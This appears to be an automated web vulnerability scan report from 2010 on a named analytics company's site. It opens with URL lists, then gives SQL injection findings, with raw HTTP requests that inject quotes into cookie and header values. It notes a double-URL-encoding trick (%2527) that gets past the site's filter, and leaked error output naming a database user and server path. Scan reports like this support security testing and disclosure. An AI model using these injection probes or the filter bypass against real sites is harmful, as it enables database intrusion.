14.18. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

14.19. http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

14.20. http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

14.21. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html

14.22. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

14.23. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html

14.24. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html

14.25. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

14.26. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html

14.27. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

14.28. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

14.29. http://www.analyticspros.com/blog/55-googleanalytics/99-unique-keywords-by-month.html

14.30. http://www.analyticspros.com/blog/56-seo/

14.31. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html

14.32. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

14.33. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html

14.34. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

14.35. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

14.36. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

14.37. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

14.38. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

14.39. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

14.40. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html

14.41. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

14.42. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

14.43. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

14.44. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html

14.45. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

14.46. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

14.47. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

14.48. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html

14.49. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

14.50. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

14.51. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html

14.52. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

14.53. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

14.54. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html

14.55. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html

14.56. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

14.57. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

14.58. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

14.59. http://www.analyticspros.com/blog/googleanalytics/function.mysql-connect

14.60. http://www.analyticspros.com/blog/seo.html

14.61. http://www.analyticspros.com/blog/seo/

14.62. http://www.analyticspros.com/blog/urchin.feed

14.63. http://www.analyticspros.com/blog/urchin.html

14.64. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html

14.65. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

14.66. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html

14.67. http://www.analyticspros.com/blog/webanalytics.feed

14.68. http://www.analyticspros.com/cache/

14.69. http://www.analyticspros.com/component/content/article/62-urchin/

14.70. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

14.71. http://www.analyticspros.com/component/jsetup/

14.72. http://www.analyticspros.com/component/jsetup/comment/

14.73. http://www.analyticspros.com/component/jsetup/comment/add.html

14.74. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect

14.75. http://www.analyticspros.com/components/

14.76. http://www.analyticspros.com/components/com_chronocontact/

14.77. http://www.analyticspros.com/components/com_chronocontact/themes/default/elements.php

14.78. http://www.analyticspros.com/components/com_chronocontact/themes/default/email.php

14.79. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/elements.php

14.80. http://www.analyticspros.com/components/com_fpss/images/

14.81. http://www.analyticspros.com/components/com_fpss/images/thumbs/

14.82. http://www.analyticspros.com/function.mysql-connect

14.83. http://www.analyticspros.com/images/

14.84. http://www.analyticspros.com/images/stories/

14.85. http://www.analyticspros.com/images/stories/blogimg/

14.86. http://www.analyticspros.com/images/stories/blogimg/thumbnails/

14.87. http://www.analyticspros.com/images/stories/products/

14.88. http://www.analyticspros.com/images/stories/products/healtcheck/

14.89. http://www.analyticspros.com/includes/

14.90. http://www.analyticspros.com/index.php

14.91. http://www.analyticspros.com/joobi/inc/mootools/

14.92. http://www.analyticspros.com/joobi/inc/nicedit/

14.93. http://www.analyticspros.com/joobi/node/library/

14.94. http://www.analyticspros.com/joobi/node/library/js/

14.95. http://www.analyticspros.com/joobi/user/media/

14.96. http://www.analyticspros.com/joobi/user/media/images/

14.97. http://www.analyticspros.com/joobi/user/media/images/captcha/

14.98. http://www.analyticspros.com/joobi/user/themes/node/members/

14.99. http://www.analyticspros.com/joobi/user/themes/node/members/css/

14.100. http://www.analyticspros.com/joobi/user/themes/site/joobi/

14.101. http://www.analyticspros.com/joobi/user/themes/site/joobi/css/

14.102. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/

14.103. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/app/

14.104. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/app/cms/

14.105. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/app/cms/48/

14.106. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/star/

14.107. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar/

14.108. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar//

14.109. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar//16/

14.110. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar/16/

14.111. http://www.analyticspros.com/joobi/user/themes/site/joobi/images/toolbar/32/

14.112. http://www.analyticspros.com/language/

14.113. http://www.analyticspros.com/libraries/

14.114. http://www.analyticspros.com/media/

14.115. http://www.analyticspros.com/media/system/

14.116. http://www.analyticspros.com/media/system/js/

14.117. http://www.analyticspros.com/modules/

14.118. http://www.analyticspros.com/modules/mod_fpss/helper.php

14.119. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php

14.120. http://www.analyticspros.com/modules/mod_fpss/includes/elements/header.php

14.121. http://www.analyticspros.com/modules/mod_fpss/includes/elements/template.php

14.122. http://www.analyticspros.com/modules/mod_fpss/mod_fpss.php

14.123. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/css/

14.124. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/default.php

14.125. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/css/

14.126. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/default.php

14.127. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/css/

14.128. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/default.php

14.129. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/css/

14.130. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/default.php

14.131. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/css/

14.132. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/default.php

14.133. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/css/

14.134. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/default.php

14.135. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/css/

14.136. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/default.php

14.137. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/css/

14.138. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/default.php

14.139. http://www.analyticspros.com/plugins/

14.140. http://www.analyticspros.com/plugins/editors/

14.141. http://www.analyticspros.com/plugins/editors/tinymce/

14.142. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/

14.143. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/

14.144. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/

14.145. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/

14.146. http://www.analyticspros.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/

14.147. http://www.analyticspros.com/plugins/system/

14.148. http://www.analyticspros.com/plugins/system/pc_includes/ajax.php

14.149. http://www.analyticspros.com/plugins/system/pc_includes/helper.php

14.150. http://www.analyticspros.com/plugins/system/pc_includes/template.php

14.151. http://www.analyticspros.com/products/

14.152. http://www.analyticspros.com/products/63-urchin/

14.153. http://www.analyticspros.com/products/63-urchin/119-urchin-6.html

14.154. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html

14.155. http://www.analyticspros.com/products/63-urchin/70-urchin.html

14.156. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html

14.157. http://www.analyticspros.com/products/64-data-warehouse/84-analytics-data-warehouse.html

14.158. http://www.analyticspros.com/products/65-ae.html

14.159. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html

14.160. http://www.analyticspros.com/products/65-ae/function.mysql-connect

14.161. http://www.analyticspros.com/products/analytics-data-warehouse.html

14.162. http://www.analyticspros.com/products/analytics-engine.html

14.163. http://www.analyticspros.com/resources/123-dimensionator-install.html

14.164. http://www.analyticspros.com/resources/64-campaign-tracker.html

14.165. http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html

14.166. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/

14.167. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html

14.168. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html

14.169. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html

14.170. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html

14.171. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/17-viget-labs-blog.html

14.172. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html

14.173. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/function.mysql-connect

14.174. http://www.analyticspros.com/resources/feeds/35-top-web-analysts.html

14.175. http://www.analyticspros.com/resources/feeds/36-other-ga-blogs.html

14.176. http://www.analyticspros.com/resources/feeds/37-ga-support-forums.html

14.177. http://www.analyticspros.com/resources/function.mysql-connect

14.178. http://www.analyticspros.com/resources/healthcheck.html

14.179. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html

14.180. http://www.analyticspros.com/templates/

14.181. http://www.analyticspros.com/templates/apros2.0/

14.182. http://www.analyticspros.com/templates/apros2.0/css/

14.183. http://www.analyticspros.com/templates/apros2.0/images/

14.184. http://www.analyticspros.com/templates/apros2.0/styles/

14.185. http://www.analyticspros.com/templates/apros2.0/styles/background/

14.186. http://www.analyticspros.com/templates/apros2.0/styles/background/lighter/

14.187. http://www.analyticspros.com/templates/apros2.0/styles/elements/

14.188. http://www.analyticspros.com/templates/system/

14.189. http://www.analyticspros.com/templates/system/css/

14.190. http://www.analyticspros.com/tmp/

14.191. http://www.analyticspros.com/urchin.html

14.192. http://www.analyticspros.com/urchin/

14.193. http://www.analyticspros.com/urchin/buy.html

14.194. http://www.analyticspros.com/urchin/urchin-6.html

14.195. http://www.analyticspros.com/urchin/urchin-hosting.html

14.196. http://www.analyticspros.com/urchin/urchin.html

15. Content type incorrectly stated

15.1. http://www.analyticspros.com/about/caleb-whitmore.html

15.2. http://www.analyticspros.com/blog/

15.3. http://www.analyticspros.com/blog/55-googleanalytics/

15.4. http://www.analyticspros.com/blog/55-googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

15.5. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

15.6. http://www.analyticspros.com/blog/55-googleanalytics/108-custom-variable-dimensions.html

15.7. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

15.8. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

15.9. http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

15.10. http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

15.11. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html

15.12. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

15.13. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html

15.14. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

15.15. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

15.16. http://www.analyticspros.com/blog/55-googleanalytics/99-unique-keywords-by-month.html

15.17. http://www.analyticspros.com/blog/56-seo/

15.18. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html

15.19. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

15.20. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

15.21. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

15.22. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

15.23. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

15.24. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

15.25. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html

15.26. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

15.27. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

15.28. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

15.29. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

15.30. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

15.31. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

15.32. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html

15.33. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

15.34. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html

15.35. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

15.36. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

15.37. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

15.38. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

15.39. http://www.analyticspros.com/blog/googleanalytics/function.mysql-connect

15.40. http://www.analyticspros.com/blog/urchin.feed

15.41. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

15.42. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html

15.43. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

15.44. http://www.analyticspros.com/component/jsetup/

15.45. http://www.analyticspros.com/component/jsetup/comment/add.html

15.46. http://www.analyticspros.com/components/com_chronocontact/themes/default/elements.php

15.47. http://www.analyticspros.com/components/com_chronocontact/themes/default/email.php

15.48. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/elements.php

15.49. http://www.analyticspros.com/function.mysql-connect

15.50. http://www.analyticspros.com/modules/mod_fpss/helper.php

15.51. http://www.analyticspros.com/modules/mod_fpss/includes/elements/categories.php

15.52. http://www.analyticspros.com/modules/mod_fpss/includes/elements/header.php

15.53. http://www.analyticspros.com/modules/mod_fpss/includes/elements/template.php

15.54. http://www.analyticspros.com/modules/mod_fpss/mod_fpss.php

15.55. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/default.php

15.56. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/default.php

15.57. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/default.php

15.58. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/default.php

15.59. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/default.php

15.60. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/default.php

15.61. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/default.php

15.62. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/default.php

15.63. http://www.analyticspros.com/plugins/system/pc_includes/ajax.php

15.64. http://www.analyticspros.com/plugins/system/pc_includes/helper.php

15.65. http://www.analyticspros.com/plugins/system/pc_includes/template.php

15.66. http://www.analyticspros.com/products/

15.67. http://www.analyticspros.com/products/63-urchin/

15.68. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html

15.69. http://www.analyticspros.com/products/64-data-warehouse/84-analytics-data-warehouse.html

15.70. http://www.analyticspros.com/products/65-ae.html

15.71. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html

15.72. http://www.analyticspros.com/products/analytics-data-warehouse.html

15.73. http://www.analyticspros.com/products/analytics-engine.html

15.74. http://www.analyticspros.com/resources/123-dimensionator-install.html

15.75. http://www.analyticspros.com/resources/64-campaign-tracker.html

15.76. http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html

15.77. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html

15.78. http://www.analyticspros.com/resources/feeds/35-top-web-analysts.html

15.79. http://www.analyticspros.com/resources/feeds/36-other-ga-blogs.html

15.80. http://www.analyticspros.com/resources/healthcheck.html

15.81. http://www.analyticspros.com/urchin/

15.82. http://www.analyticspros.com/urchin/buy.html

15.83. http://www.analyticspros.com/urchin/urchin-6.html

15.84. http://www.analyticspros.com/urchin/urchin.html



1. SQL injection
There are 283 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.analyticspros.com/ [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 03:52:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET / HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 03:52:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:52:27 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 03:52:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.2. http://www.analyticspros.com/about/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /about/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:37:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /about/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:37:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.3. http://www.analyticspros.com/administrator/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /administrator/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /administrator/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:09:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /administrator/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
